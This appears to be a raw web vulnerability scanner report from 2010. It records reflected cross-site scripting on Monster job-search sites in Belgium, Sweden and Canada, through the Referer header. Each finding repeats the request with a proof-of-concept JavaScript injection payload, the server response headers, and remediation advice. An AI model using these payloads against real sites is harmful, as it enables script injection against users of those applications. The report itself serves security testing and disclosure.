Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: job.monster.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=81db5'-alert(1)-'428ed200170
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:42:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jkyeloj4zob5jfuju12v1p45; path=/; HttpOnly
Set-Cookie: webtrends_Profile=true; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:42:31 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:42:31 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 386796
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d71c'-alert(1)-'1b38a4de911 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: jobb.monster.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2d71c'-alert(1)-'1b38a4de911
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:45:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kekdph55gswnxg45u0ed1w55; path=/; HttpOnly
Set-Cookie: webtrends_Profile=true; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:45:08 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:45:08 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 462383
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91ee9'-alert(1)-'a9b6f4997a0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Advertising-PR-Services/get-jobs-13.aspx HTTP/1.1
Host: jobsearch.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65;
Referer: http://www.google.com/search?hl=en&q=91ee9'-alert(1)-'a9b6f4997a0
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:48:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: JSRTimeStamp=634263797002903663; domain=.monster.ca; path=/
Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/
Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=29&where=State%3aAlberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:20 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:20 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 680750
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34dd1'-alert(1)-'8d56565b039 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Calgary/get-jobs-12.aspx HTTP/1.1
Host: jobsearch.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65;
Referer: http://www.google.com/search?hl=en&q=34dd1'-alert(1)-'8d56565b039
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:49:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: JSRTimeStamp=634263797467756338; domain=.monster.ca; path=/
Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/
Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&where=Calgary%2c+Alberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:49:06 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:49:06 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 711897
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd18b'-alert(1)-'1b938d3ec5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Computer-Hardware/get-jobs-13.aspx HTTP/1.1
Host: jobsearch.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65;
Referer: http://www.google.com/search?hl=en&q=cd18b'-alert(1)-'1b938d3ec5
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:50:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: JSRTimeStamp=634263798007017737; domain=.monster.ca; path=/
Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/
Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=32&where=State%3aAlberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:50:00 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:50:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 687373
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96dd0'-alert(1)-'2c8186c1c1c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Computer-IT-Services/get-jobs-13.aspx HTTP/1.1
Host: jobsearch.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65;
Referer: http://www.google.com/search?hl=en&q=96dd0'-alert(1)-'2c8186c1c1c
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:50:03 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: JSRTimeStamp=634263798033059786; domain=.monster.ca; path=/
Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/
Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=77&where=State%3aAlberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:50:03 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:50:03 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 674897
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45aa5'-alert(1)-'34f36938004 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Edmonton/get-jobs-12.aspx HTTP/1.1
Host: jobsearch.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65;
Referer: http://www.google.com/search?hl=en&q=45aa5'-alert(1)-'34f36938004
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:50:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: JSRTimeStamp=634263798046817225; domain=.monster.ca; path=/
Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/
Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&where=Edmonton%2c+Alberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:50:04 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:50:04 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 715474
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb063'-alert(1)-'0f03174726d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Management-Consulting-Services/DoNotAddToP4/UserControls/ HTTP/1.1
Host: jobsearch.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65;
Referer: http://www.google.com/search?hl=en&q=fb063'-alert(1)-'0f03174726d
Response
HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 19:46:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:46:58 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:46:58 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 107602
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd60c'-alert(1)-'2538e38dd2b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Management-Consulting-Services/Search.aspx HTTP/1.1
Host: jobsearch.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65;
Referer: http://www.google.com/search?hl=en&q=cd60c'-alert(1)-'2538e38dd2b
Response
HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 26 Nov 2010 19:38:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:38:11 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:38:11 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f0ea'-alert(1)-'b7b9ff4c0c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Management-Consulting-Services/get-jobs-13.aspx HTTP/1.1
Host: jobsearch.monster.ca
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=4f0ea'-alert(1)-'b7b9ff4c0c4
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 26 Nov 2010 19:38:32 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zzyezc45jrvwzh45h5gm1uzp; path=/; HttpOnly
Set-Cookie: split_scsjsv=98; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:38:32 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: JSRTimeStamp=634263791127124008; domain=.monster.ca; path=/
Set-Cookie: NumberOfJSR=1; domain=.monster.ca; path=/
Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=45; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:38:32 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:38:32 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:38:32 GMT; path=/
Vary: Accept-Encoding
Content-Length: 687398
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 772a8'-alert(1)-'1f5036ff004 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Alberta/Staffing-Employment-Agencies/get-jobs-13.aspx HTTP/1.1
Host: jobsearch.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65;
Referer: http://www.google.com/search?hl=en&q=772a8'-alert(1)-'1f5036ff004
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:49:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: JSRTimeStamp=634263797903022544; domain=.monster.ca; path=/
Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/
Set-Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=46&where=State%3aAlberta&cy=ca&referrer=search.aspx; domain=.monster.ca; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:49:50 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:49:50 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 691266
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea06a'-alert(1)-'7a74d60fb22 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Search.aspx HTTP/1.1
Host: jobsearch.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BackToJSRLink=vw=b&YellowInter=1&re=14&rad=32&rad_units=km&pg=1&sid=1&indid=31&where=State%3aAlberta&cy=ca&referrer=search.aspx; ssljsv=1; NumberOfJSR=1; JSRTimeStamp=634263782665902043; split_ssljsv=4; TC_Top=; scsjsv=0; ASP.NET_SessionId=irqy5bnmmoutujr5eyfafze0; TC_Bottom=; split_scsjsv=65;
Referer: http://www.google.com/search?hl=en&q=ea06a'-alert(1)-'7a74d60fb22
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:50:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: JSRTimeStamp=634263798082906125; domain=.monster.ca; path=/
Set-Cookie: NumberOfJSR=2; domain=.monster.ca; path=/
Set-Cookie: BackToJSRLink=&referrer=search.aspx; domain=.monster.ca; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:50:08 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:50:08 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 705487
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
